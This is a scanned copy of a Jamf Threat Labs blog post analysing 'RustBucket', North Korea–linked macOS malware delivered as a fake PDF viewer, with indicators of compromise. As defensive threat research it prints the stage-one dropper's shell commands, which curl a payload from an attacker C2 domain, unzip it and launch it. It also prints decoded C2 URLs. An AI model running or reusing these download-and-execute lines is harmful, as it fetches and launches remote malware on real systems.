www.jamf.com
Open in
urlscan Pro
13.33.187.10
Public Scan
Submitted URL: https://tinyurl.com/5n7f56a8
Effective URL: https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/
Submission Tags: falconsandbox
Submission: On April 18 via api from US — Scanned from DE
Effective URL: https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/
Submission Tags: falconsandbox
Submission: On April 18 via api from US — Scanned from DE
Form analysis 3 forms found in the DOM
GET https://www.jamf.com/resources/search/
<form data-publisher-ignored="yes" action="https://www.jamf.com/resources/search/" method="GET" class="search-input">
<button class="search-input__submit" type="submit">
<svg>
<use href="#icon__magnifier"></use>
</svg>
</button>
<input id="resource-search" class="search-input__keywords" name="keywords" type="text" required="">
<span for="keywords" class="search-input__placeholder"> e.g. Device Management </span>
<button class="search-input__reset" type="reset">
<svg>
<use href="#icon__x"></use>
</svg>
</button>
</form>GET https://www.jamf.com/search/
<form data-publisher-ignored="yes" action="https://www.jamf.com/search/" method="GET" class="navigation__search-input search-input">
<input class="search-input__keywords" name="keywords" type="text" required="" autocomplete="off">
<span for="keywords" class="search-input__placeholder"> Search </span>
<button class="search-input__submit" type="submit">
<svg>
<use href="#icon__magnifier"></use>
</svg>
<span class="sr-only"> Submit </span>
</button>
<button class="search-input__reset" type="reset">
<svg>
<use href="#icon__x"></use>
</svg>
<span class="sr-only"> Reset </span>
</button>
</form>Name: mktForm_3577_MZmXudGE — POST https://www.jamf.com/index.php/?ACT=107
<form method="post" action="https://www.jamf.com/index.php/?ACT=107" enctype="application/x-www-form-urlencoded" id="mktForm_3577_MZmXudGE" name="mktForm_3577_MZmXudGE"
class="js-form-has-validation js-form-append-conversion-parameters subscription-form" data-message-success="Thank you! We have received your request. Expect to hear from us soon."
data-message-error="Oops! Something went wrong! Please check your information and submit again." data-track-action="Completed Blog Subscription" data-track-category="Forms"
data-track-label="https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/" data-prefill-enabled="false" data-zi-program-name="Subscribe to Blog">
<div class="j-grid j-grid--2up">
<div>
<!-- UPDATED --><input type="hidden" name="csrf_token" value="aca322d076891193a6dfb72f904083d1cea32dc9"><!-- /UPDATED -->
<input type="hidden" name="formId" value="3577">
<input type="hidden" name="programName" value="Subscribe to Blog">
<input type="hidden" name="UserPasswordSecret" value="">
<input type="hidden" name="validFormFields" value="Email|LeadSource|Lead_Source_Detail__c|utm_source__c|utm_medium__c|utm_term__c|utm_campaign__c">
<div class="form-group ">
<label for="mktform-3577-email" class="control-label"> Email Address (Work) <span class="required-indicator" title="Required" aria-hidden="true" role="presentation">*</span>
<span class="sr-only">Required</span>
</label>
<div class="form-control__wrapper">
<input aria-describedby="mktform-3577-email-status" class="form-control" data-parsley-errors-container="#mktform-3577-email-status" data-validation-error-msg="Must be valid email. example@yourdomain.com" id="mktform-3577-email" name="Email"
required="" type="email">
</div>
<div class="help-block" id="mktform-3577-email-status"></div>
</div>
<div class="form-group hidden">
<input type="hidden" name="LeadSource">
<div class="help-block" id="mktform-3577-leadsource-status"></div>
</div>
<div class="form-group hidden">
<input type="hidden" name="Lead_Source_Detail__c">
<div class="help-block" id="mktform-3577-lead-source-detail--c-status"></div>
</div>
<div class="form-group hidden">
<input type="hidden" name="utm_source__c">
<div class="help-block" id="mktform-3577-utm-source--c-status"></div>
</div>
<div class="form-group hidden">
<input type="hidden" name="utm_medium__c">
<div class="help-block" id="mktform-3577-utm-medium--c-status"></div>
</div>
<div class="form-group hidden">
<input type="hidden" name="utm_term__c">
<div class="help-block" id="mktform-3577-utm-term--c-status"></div>
</div>
<div class="form-group hidden">
<input type="hidden" name="utm_campaign__c">
<div class="help-block" id="mktform-3577-utm-campaign--c-status"></div>
</div>
</div>
<div class="form-group form-group--full-width call-to-action">
<div class="call-to-action__link">
<button name="submitButton" class="btn j-btn--primary" type="submit">Subscribe via email</button>
</div>
</div>
</div>
</form>Text Content
Skip to main content English
* English
Jamf Home Toggle Navigation
* Solutions
The Jamf platform Where device love meets Trusted Access
manage devices
Zero-touch deployment
Mobile Device Management (MDM)
App management
Inventory management
Self Service
secure endpoints
Identity and access management
Endpoint protection
Threat prevention and remediation
Content filtering and safe internet
Zero Trust Network Access (ZTNA)
Security visibility and compliance
explore industries
Business Improve business operations and empower employees
Education Accelerate learning through streamlined education technology
Healthcare Enhance the patient experience and personalize telehealth
Learn about the products that drive Jamf’s solutions.
* Products
* Pricing
* Resources
Search resources
e.g. Device Management
--------------------------------------------------------------------------------
Browse Resources by Type:
* Blog Get the latest industry insights, news, product updates and more.
* E-books Thought-provoking content designed to keep you ahead of industry
trends.
* White Papers Research reports and best practices to keep you informed of
Apple management tactics.
* Videos See product demos in action and hear from Jamf customers.
* Case Studies Apple management success stories from those saving time and
money with Jamf.
* Webinars On-demand webinar videos covering an array of Apple management
topics.
* Product Documentation Learn more about our products and what they can do
for your organization.
* Partners
The Jamf Partner Program
For partners
Register a deal
Resources
Training
Become a partner
MSP
Reseller
Integrator
Technology
Buy from a partner
Partner directory
* Contact
Start Trial
* Site Search
Search Submit Reset
* Start Trial
1. Jamf Home
2. Blog
3. BlueNoroff APT group targets macOS with 'RustBucket' Malware
* Start Trial
Jamf Blog
April 21, 2023 by Jamf Threat Labs
BLUENOROFF APT GROUP TARGETS MACOS WITH ‘RUSTBUCKET’ MALWARE
Jamf Threat Labs
Learn about the macOS malware variant discovered by Jamf Threat Labs named
'RustBucket'. What it does, how it works to compromise macOS devices, where it
comes from and what administrators can do to protect their Apple fleet.
By Ferdous Saljooki and Jaron Bradley
Jamf Threat Labs has discovered a macOS malware family that communicates with
command and control (C2) servers to download and execute various payloads. We
track and protect against this malware family under the name ‘RustBucket’ and
suspect it to be attributed to a North Korean, state-sponsored threat actor. The
APT group called BlueNoroff is thought to act as a sub-group to the well-known
Lazarus Group and is believed to be behind this attack. This attribution is due
to the similarities noted in a Kaspersky blog entry documenting an attack on the
Windows side. These similarities include malicious tooling on macOS that closely
aligns with the workflow and social engineering patterns of those employed in
the campaign.
STAGE-ONE
The stage-one malware (0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be) was discovered
while performing normal hunting routines for compiled AppleScript applications
that contained various suspicious commands. Among our results, we identified a
suspicious AppleScript file titled main.scpt contained within an unsigned
application named Internal PDF Viewer.app. It should be noted that we have no
reason to believe this application is allowed to execute without the user
manually overriding Gatekeeper.
The directory structure for the stage-one dropper is shown below. As with all
compiled AppleScript applications, the primary app code is within the main.scpt
file, located within the /Contents/Resources/Scripts/ directory.
tree Internal\ PDF\ Viewer.app/ Internal PDF Viewer.app/ └── Contents ├──
Info.plist ├── MacOS │ └── applet ├── PkgInfo └── Resources ├── Scripts │ └──
main.scpt ├── applet.icns ├── applet.rsrc └── description.rtfd └── TXT.rtf
tree Internal\ PDF\ Viewer.app/
Internal PDF Viewer.app/
└── Contents
├── Info.plist
├── MacOS
│ └── applet
├── PkgInfo
└── Resources
├── Scripts
│ └── main.scpt
├── applet.icns
├── applet.rsrc
└── description.rtfd
└── TXT.rtf
Although the AppleScript was compiled, we were able to extract its contents by
loading it into the macOS Script Editor application. When launched, the dropper
executes the code seen below:
do shell script "curl -o /users/shared/1.zip
hxxps://cloud.dnx.capital/ZyCws4dD_zE/aUhUJV0p6P/S9XrRH9%2B/R51g4b5Kjj/abnY%3D
-A cur1" do shell script "unzip -o -d /users/shared /users/shared/1.zip" do
shell script "open \"/users/shared/Internal PDF Viewer.app\""
do shell script "curl -o /users/shared/1.zip hxxps://cloud.dnx.capital/ZyCws4dD_zE/aUhUJV0p6P/S9XrRH9%2B/R51g4b5Kjj/abnY%3D -A cur1"
do shell script "unzip -o -d /users/shared /users/shared/1.zip"
do shell script "open \"/users/shared/Internal PDF Viewer.app\""
The stage-one simply executes various do shell script commands to download the
stage-two from the C2 using curl. The malware writes and extracts the contents
of the zip file to the /Users/Shared/ directory and executes the stage-two
application also named Internal PDF Viewer.app. By breaking up the malware into
several components or stages, the malware author makes analysis more difficult,
especially if the C2 goes offline. This is a clever but common technique used by
malware authors to thwart analysis.
At the time of our analysis, both the stage-one and stage-two components of this
malware were undetected on VirusTotal.
STAGE-TWO
Although the stage-two (ca59874172660e6180af2815c3a42c85169aa0b2) application
name and icons look very similar to stage-one, the directory structures are
different and there is no use of AppleScript in the latter. The application
version, size and bundle identifier — com.apple.pdfViewer — are also notably
different, masquerading as a legitimate Apple bundle identifier. This
application is signed with an ad-hoc signature as well.
The application layout is that of a much more traditional app and is written in
Objective-C.
tree Internal\ PDF\ Viewer.app/ Internal PDF Viewer.app/ └── Contents ├──
Info.plist ├── MacOS │ └── Internal PDF Viewer ├── PkgInfo ├── Resources │ ├──
AppIcon.icns │ ├── Assets.car │ └── Base.lproj │ └── Main.storyboardc │ ├──
Info.plist │ ├── MainMenu.nib │ │ ├── keyedobjects-101300.nib │ │ └──
keyedobjects.nib │ ├── NSWindowController-B8D-0N-5wS.nib │ │ ├──
keyedobjects-101300.nib │ │ └── keyedobjects.nib │ └──
XfG-lQ-9wD-view-m2S-Jp-Qdl.nib │ ├── keyedobjects-101300.nib │ └──
keyedobjects.nib └── _CodeSignature └── CodeResources
tree Internal\ PDF\ Viewer.app/
Internal PDF Viewer.app/
└── Contents
├── Info.plist
├── MacOS
│ └── Internal PDF Viewer
├── PkgInfo
├── Resources
│ ├── AppIcon.icns
│ ├── Assets.car
│ └── Base.lproj
│ └── Main.storyboardc
│ ├── Info.plist
│ ├── MainMenu.nib
│ │ ├── keyedobjects-101300.nib
│ │ └── keyedobjects.nib
│ ├── NSWindowController-B8D-0N-5wS.nib
│ │ ├── keyedobjects-101300.nib
│ │ └── keyedobjects.nib
│ └── XfG-lQ-9wD-view-m2S-Jp-Qdl.nib
│ ├── keyedobjects-101300.nib
│ └── keyedobjects.nib
└── _CodeSignature
└── CodeResources
When the Internal PDF Viewer application is launched, the user is presented with
a PDF viewing application where they can select and open PDF documents. The
application, although basic, does actually operate as a functional PDF viewer. A
task that isn’t overly difficult using Apple’s well-built PDFKit Framework.
Upon execution, the application does not perform any malicious actions yet. In
order for the malware to take the next step and communicate with the attacker,
the correct PDF must be loaded. We were able to track down a malicious PDF
(7e69cb4f9c37fad13de85e91b5a05a816d14f490) we believe to be tied to this
campaign, as it meets all the criteria in order to trigger malicious behaviors.
For example, when the malicious PDF is double-clicked from within Finder the
user will see the following:
This minimal message informs the user that they must open the PDF using the
necessary application in order to see the full details.
When opened within the malicious PDF viewer, the user will see a document (9
pages in total) that shows a venture capital firm that is interested in
investing in different tech startups. From what we can tell, the PDF was created
by taking the website of a small but legitimate venture capital firm and putting
it into PDF format.
It should be noted here that earlier, the stage-one dropper reached out to
cloud[.]dnx[.]capital, thus keeping on theme with the disguise of a venture
capital firm.
This PDF viewer technique used by the attacker is a clever one. At this point,
in order to perform analysis, not only do we need the stage-two malware but we
also require the correct PDF file that operates as a key in order to execute the
malicious code within the application.
SO, HOW IS THE MALWARE DISPLAYING A DIFFERENT PDF THAN THE ONE LOADED BY THE
USER?
To answer this, we take a closer look into some of the functions within the app.
Most notably, we see one titled viewPDFas part of the PEPWindow class. This
function seeks to a specific offset within the loaded PDF to check for a
specific blob of data. If the expected data is present, a function called
_encrypt_data is invoked, which, ironically runs code to decrypt the blob and
produce a new PDF. It does this using a hardcoded 100-byte XOR key which can be
found in the __CONSTdata of the executable.
This newly decrypted PDF is then displayed to the user in the application,
providing the illusion that this app was truly necessary in order to view the
full details of the PDF.
Since the embedded PDF file is loaded directly into the viewer, it is never
written to the disk. Using a disassembler — such as Hopper — we can extract it
by placing a breakpoint on the return in the encrypt_data function.
If analyzing the ARM executable (as opposed to the Intel executable), we can
print the $x0 register which gives us all the bytes of the decrypted blob.
Saving these bytes into a file will also reveal the inner PDF file.
STAGE-TWO COMMUNICATION
So far we’ve decoded the PDF file that is embedded within the original PDF file,
but as we stated earlier, this is the point where the malware will also phone
home to the attacker. Much like the inner PDF document, the attacker’s C2 is
also XOR encoded within the original PDF. This is why we see the encrypt_data
function run a second time. The following bytes are passed to it which can be
found towards the bottom of the original PDF document.
41 18 95 ed a5 03 3c ef d1 f1 3d ba 6a 23 3d ef 0d 22 c0 32 79 c5 a3 f8 1c b6 95
b3 99 35 93 c5 c5 6f 9c a0 df 6a 36 53 99 56 ac d2 8e c0 a7 e6 dc 16 f0 ad cf 73
14 bd 55 f5 14 b6 5a f2 af 10 e9 c2 60 c9 c0 8b 69 f1 e2 79 38 09 0a de 3e 45 6e
7d 24 73 99 30 cc 77 a1 5e
41 18 95 ed a5 03 3c ef d1 f1 3d ba 6a 23 3d ef 0d 22 c0 32 79 c5 a3 f8 1c b6 95 b3 99 35 93 c5 c5 6f 9c a0 df 6a 36 53 99 56 ac d2 8e c0 a7 e6 dc 16 f0 ad cf 73 14 bd 55 f5 14 b6 5a f2 af 10 e9 c2 60 c9 c0 8b 69 f1 e2 79 38 09 0a de 3e 45 6e 7d 24 73 99 30 cc 77 a1 5e
This time when the encrypt_data function runs using the same hardcoded XOR key
as before, it returns the following:
hxxps://deck.31ventures.info/i5OvDE_RB/rUHSnl3rUu/V9Qj0zfRjl/hz2dhwQMGe/64uVA7PeqBYfe9gD/D
hxxps://deck.31ventures.info/i5OvDE_RB/rUHSnl3rUu/V9Qj0zfRjl/hz2dhwQMGe/64uVA7PeqBYfe9gD/D
After the embedded PDF has been displayed to the user and the URL has been
de-obfuscated, the malware then calls a function titled _downAndExecute and
makes a POST request to a C2 server to presumably retrieve and execute a
stage-three payload.
In the _downAndExecute function shown below, we can see the various parameters
being set in order to initiate an HTTPrequest.
The malware also creates a new thread and sleeps before making the POST request
again in a loop until an HTTP 200 response is returned.
Unfortunately, at the time of our analysis, the server was not responding with
the necessary message.
We have however managed to discover a new URL on the same domain that is hosting
a Mach-O executable that we believe to be the new location of the final payload.
hxxps://deck[.]31ventures[.]info/QKUh2zHgeC4/cvlw4kykmB/KANCcmwLIz/wYBfGR5XFn/_E=
hxxps://deck[.]31ventures[.]info/QKUh2zHgeC4/cvlw4kykmB/KANCcmwLIz/wYBfGR5XFn/_E=
If the stage-two dropper succeeds in downloading the stage-three payload, we can
view the next actions within the downAndExecute_block_invoke.
The aforementioned image shows the following steps taking place if the C2
responds:
1. The malware creates a temporary directory and writes the received file to
that temporary directory. The name of that malicious file will be the
current mach timestamp (the number of seconds since midnight January 1st,
2001). An example file path would look like this:
<strong>/</strong>var/folders/g6/w3s4hg8n57sgfjl4xgrhjs_w0000gn/T/703517604263
2. Executable permissions are assigned to the new file.
3. The program arguments are set and the file is executed. The set argument is
that of the attacker C2 decoded from this stage two payload. The stage-three
will go on to use this value.
STAGE-THREE
The stage-three payload (182760cbe11fa0316abfb8b7b00b63f83159f5aa) is an ad-hoc
signed trojan written in Rust and weighing in at a sizable 11.2MB. It’s a
universal binary that holds both ARM and x86 architectures. Upon initial
execution, it performs a handful of system recon commands.
One of the earliest used modules is titled webT::getinfo. Within this module is
the ability to look at the basic info about the system, process listing, current
time and whether or not it’s running within a VM. The functions are named
accordingly.
Running this malware results in communication to the URL provided as the first
argument passed at execution time. The WebT::send_request function is
responsible for sending the initial message to the C2 server. When placing a
breakpoint on it, we can step over it resulting in a call to the server.
This payload allows the attacker to carry out further objectives on the system,
but perhaps a deep dive on stage-three is best saved for another blog post.
AT A HIGH LEVEL
We dove fairly deeply into some of the different actions of this malware. At a
higher level, the workflow looks like the following:
CONNECTIONS TO BLUENOROFF
There are a few signs that this malware is tied to BlueNoroff. First and
foremost is the domain used in the stage-one dropper: cloud[.]dnx[.]capital.
This domain was reported as being used by the attackers in a writeup done by
Proofpoint. In the previously mentioned Kaspersky blog, it was reported that the
attackers had created numerous fake domains impersonating venture capital firms
and banks in a campaign Kaspersky titled ‘SnatchCrypto’. This aligns with the
social engineering schemes discovered in the PDF document. The Windows malware
also used the “decoy document” approach which clearly worked well for the
attacker. The earliest submission of the “Internal PDF Viewer” we could find on
VirusTotal was uploaded in January 2023 and we’ve observed the attackers
continuing to host it.
While many different PDF payloads exist that work on Windows, so far only one
PDF has been discovered that will result in a call to the attacker on macOS. We
do suspect more than just this one PDF exists. It’s worth noting that the XOR
key found within the malware can also be found within a variety of malicious PDF
files. However, when loaded into the Viewer application, these files do not
result in a properly decoded URL. We suspect a different variant of the
malicious viewer (or perhaps a different platform) is capable of loading the XOR
key from within the PDF instead of the attackers hardcoding it in the malicious
app.
CONCLUSION
The malware used here shows that as macOS grows in market share, attackers
realize that a number of victims will be immune if their tooling is not updated
to include the Apple ecosystem. Lazarus group, which has strong ties to
BlueNoroff, has a long history of attacking macOS and it’s likely we’ll see more
APT groups start doing the same.
Jamf Protect defends against the malicious components of this malware and blocks
the malicious domains. Jamf Threat Labs will continue to monitor BlueNoroff’s
activity on this campaign.
A shout out to Patrick Wardle for his collaboration on some of the analysis
here. If you’re looking to learn more about the analysis of macOS malware, check
out the free online book: The Art of Mac Malware.
INDICATORS OF COMPROMISE
domains: cloud[.]dnx[.]capital - (Called from the Stage-one payload
deck[.]31ventures[.]info - (Called from the Stage-two and Stage-three payloads)
Stage-One: dabb4372050264f389b8adcf239366860662ac52 - main.scpt
0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be - Internal PDF Viewer.zip Stage-Two:
e0e42ac374443500c236721341612865cd3d1eec - Internal PDF Viewer Universal Binary
ac08406818bbf4fe24ea04bfd72f747c89174bdb - Internal PDF Viewer x86 Binary
72167ec09d62cdfb04698c3f96a6131dceb24a9c - Internal PDF Viewer Arm Binary
fd1cef5abe3e0c275671916a1f3a566f13489416 - Internal PDF Viewer x86 Binary
ca59874172660e6180af2815c3a42c85169aa0b2 - Internal PDF Viewer.app.zip
d9f1392fb7ed010a0ecc4f819782c179efde9687 - PDF Viewer JIC Internal.zip
9121509d674091ce1f5f30e9a372b5dcf9bcd257 - Internal PDF Viewer.app.zip
a1a85cba1bc4ac9f6eafc548b1454f57b4dff7e0 - Internal PDF Viewer.app.zip
7a5d57c7e2b0c8ab7d60f7a7c7f4649f33fea8aa - Pdf Viewer.zip Stage-Three:
182760cbe11fa0316abfb8b7b00b63f83159f5aa - Rust trojan Malicious PDFs:
7e69cb4f9c37fad13de85e91b5a05a816d14f490 - InvestmentStrategy(Protected).pdf
be234cb6819039d6a1d3b1a205b9f74b6935bbcc - DOJ Report on Bizlato
Investigation_asistant.pdf) 469236d0054a270e117a2621f70f2a494e7fb823 - DOJ
Report on Bizlato Investigation.pdf e7158bb75adf27262ec3b0f2ca73c802a6222379 -
Daiwa Ventures.pdf Malicious File Paths: /Users/Shared/Internal PDF Viewer.app
domains:
cloud[.]dnx[.]capital - (Called from the Stage-one payload
deck[.]31ventures[.]info - (Called from the Stage-two and Stage-three payloads)
Stage-One:
dabb4372050264f389b8adcf239366860662ac52 - main.scpt
0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be - Internal PDF Viewer.zip
Stage-Two:
e0e42ac374443500c236721341612865cd3d1eec - Internal PDF Viewer Universal Binary
ac08406818bbf4fe24ea04bfd72f747c89174bdb - Internal PDF Viewer x86 Binary
72167ec09d62cdfb04698c3f96a6131dceb24a9c - Internal PDF Viewer Arm Binary
fd1cef5abe3e0c275671916a1f3a566f13489416 - Internal PDF Viewer x86 Binary
ca59874172660e6180af2815c3a42c85169aa0b2 - Internal PDF Viewer.app.zip
d9f1392fb7ed010a0ecc4f819782c179efde9687 - PDF Viewer JIC Internal.zip
9121509d674091ce1f5f30e9a372b5dcf9bcd257 - Internal PDF Viewer.app.zip
a1a85cba1bc4ac9f6eafc548b1454f57b4dff7e0 - Internal PDF Viewer.app.zip
7a5d57c7e2b0c8ab7d60f7a7c7f4649f33fea8aa - Pdf Viewer.zip
Stage-Three:
182760cbe11fa0316abfb8b7b00b63f83159f5aa - Rust trojan
Malicious PDFs:
7e69cb4f9c37fad13de85e91b5a05a816d14f490 - InvestmentStrategy(Protected).pdf
be234cb6819039d6a1d3b1a205b9f74b6935bbcc - DOJ Report on Bizlato Investigation_asistant.pdf)
469236d0054a270e117a2621f70f2a494e7fb823 - DOJ Report on Bizlato Investigation.pdf
e7158bb75adf27262ec3b0f2ca73c802a6222379 - Daiwa Ventures.pdf
Malicious File Paths:
/Users/Shared/Internal PDF Viewer.app
REFERENCES:
https://securelist.com/bluenoroff-methods-bypass-motw/108383/
https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds
https://securelist.com/bluenoroff-methods-bypass-motw/108383/
https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds
ENSURE YOUR MACOS ENDPOINTS ARE PROTECTED FROM CURRENT AND NOVEL MAC-CENTRIC
THREATS.
Don't just take Jamf's word for it, put Jamf Protect to the test today.
Request Trial
Share
* Share on Facebook
* Share on Twitter
* Share on LinkedIn
* Share via email
Jamf Threat Labs
Jamf
Jamf Threat Labs is a global team of experienced threat researchers,
cybersecurity experts and data scientists with skills that span penetration
testing, network monitoring, malware research and app risk assessment. Jamf
Threat Labs primarily monitors and explores emerging threats affecting Mac and
mobile devices. The team’s research is published with the aim of raising
awareness of specific threats while also improving awareness and advocacy of
security practices to protect the modern workforce.
Previous Blog Post:
Prev
Learn the fundamentals of cybersecurity for schools (K-12 education) Blog
Homepage
Next Blog Post:
Next
Cisco keeps up with Apple to keep devices secure and compliant
Related Resources
Blog
WHAT IS JAMF THREAT LABS?
Read More
White Paper
HOW TO ESTABLISH A THREAT HUNTING TEAM IN YOUR ORGANIZATION
Read More
Blog
BLUENOROFF STRIKES AGAIN WITH NEW MACOS MALWARE
Read More
Browse Blog
by Category:
Jamf Pro (587) Enterprise (495) Jamf Nation User Conference (324) Security (317)
K-12 Education (184) Healthcare (152) Jamf Protect (148) Jamf School (130)
Jamf Now (110) Jamf Connect (106) Small Business (105) Higher Education (95)
Government (71) Jamf Threat Labs (46) Marketplace (38) Retail (34) Jamf
Teacher (33) Commercial (28) Jamf Safe Internet (28) Jamf Nation (27) Jamf
Parent (23) Hospitality (21) Casper Suite (15) Field Services (15) Zero-Trust
Cloud Security (14) Webinars (10) Case Studies (9) White Papers (5) Jamf
Reset (5) Jamf Setup (5) Jamf Cloud Distribution Service (4) Technical
Papers (4) Videos (2) Product Documentation (2) Compliance Reporter (1) Press
Releases (1)
View More Blog Categories Main Blog Categories
Subscribe to the Jamf Blog
Have market trends, Apple updates and Jamf news delivered directly to your
inbox.
Email Address (Work) * Required
Subscribe via email
To learn more about how we collect, use, disclose, transfer, and store your
information, please visit our Privacy Policy.
Jamf English
* English
Jamf’s purpose is to simplify work by helping organizations manage and secure an
Apple experience that end users love and organizations trust. Jamf is the only
company in the world that provides a complete management and security solution
for an Apple-first environment that is enterprise secure, consumer simple and
protects personal privacy. Learn about Jamf.
+1 612-605-6625 info@jamf.com
BUSINESS
EDUCATION
HEALTHCARE
THE JAMF PLATFORM
* Zero-touch deployment
* Mobile Device Management (MDM)
* App management
* Inventory management
* Self Service
* Identity and access management
* Endpoint protection
* Threat prevention and remediation
* Content filtering and safe internet
* Zero Trust Network Access (ZTNA)
* Security visibility and compliance
PRICING
SUPPORT
* Jamf Pro
* Jamf Now
* Jamf School
* Jamf Connect
* Jamf Protect Support
SERVICES
* Onboarding
* Premium Services
* Jamf Services Policies
TRAINING
* In-Class
* Online
* Training Policies
STORE
RESOURCES
* Events
* Blog
* E-books
* Case Studies
* White Papers
* Jamf Threat Labs
PARTNERS
* For partners
* Become a partner
* Buy from a partner
* Marketplace
* Developers
PRODUCTS
* Jamf Pro
* Jamf Now
* Jamf School
* Jamf Connect
* Jamf Protect
* Jamf Safe Internet
* Jamf Executive Threat Protection
INTEGRATIONS
* Apple
* AWS
* Microsoft
* Google
* Okta
ABOUT
* Leadership
* Contact
* News
* Press Releases
* Careers
* Events
* Investor Relations
* Media Kit
* Trust Center
* Corporate Responsibility
* Jamf Ventures
English
* English
All contents © copyright 2002-2024 Jamf. All rights reserved.
Copyright Privacy Terms of Use Trust Modern Slavery Act Statement
Twitter LinkedIn YouTube Instagram Facebook
Back to Top Cookie Settings
By clicking “Accept All Cookies”, you agree to the storing of cookies on your
device to enhance site navigation, analyze site usage, and assist in our
marketing efforts.
Reject All Accept All Cookies
Cookie Settings
PRIVACY PREFERENCE CENTER
When you visit any website, it may store or retrieve information on your
browser, mostly in the form of cookies. This information might be about you,
your preferences or your device and is mostly used to make the site work as you
expect it to. The information does not usually directly identify you, but it can
give you a more personalized web experience. Because we respect your right to
privacy, you can choose not to allow some types of cookies. Click on the
different category headings to find out more and change our default settings.
However, blocking some types of cookies may impact your experience of the site
and the services we are able to offer.
More information
Allow All
MANAGE CONSENT PREFERENCES
STRICTLY NECESSARY COOKIES
Always Active
These cookies are necessary for the website to function and cannot be switched
off in our systems. They are usually only set in response to actions made by you
which amount to a request for services, such as setting your privacy
preferences, logging in or filling in forms. You can set your browser to block
or alert you about these cookies, but some parts of the site will not then work.
These cookies do not store any personally identifiable information.
View Vendor Details
PERFORMANCE COOKIES
Performance Cookies
These cookies allow us to count visits and traffic sources so we can measure and
improve the performance of our site. They help us to know which pages are the
most and least popular and see how visitors move around the site. All
information these cookies collect is aggregated and therefore anonymous. If you
do not allow these cookies we will not know when you have visited our site, and
will not be able to monitor its performance.
View Vendor Details
FUNCTIONAL COOKIES
Functional Cookies
These cookies enable the website to provide enhanced functionality and
personalisation. They may be set by us or by third party providers whose
services we have added to our pages. If you do not allow these cookies then some
or all of these services may not function properly.
View Vendor Details
TARGETING COOKIES
Targeting Cookies
These cookies may be set through our site by our advertising partners. They may
be used by those companies to build a profile of your interests and show you
relevant adverts on other sites. They do not store directly personal
information, but are based on uniquely identifying your browser and internet
device. If you do not allow these cookies, you will experience less targeted
advertising.
View Vendor Details
Back Button
VENDORS LIST
Search Icon
Filter Icon
Clear
checkbox label label
Apply Cancel
Consent Leg.Interest
checkbox label label
checkbox label label
checkbox label label
Reject All Confirm My Choices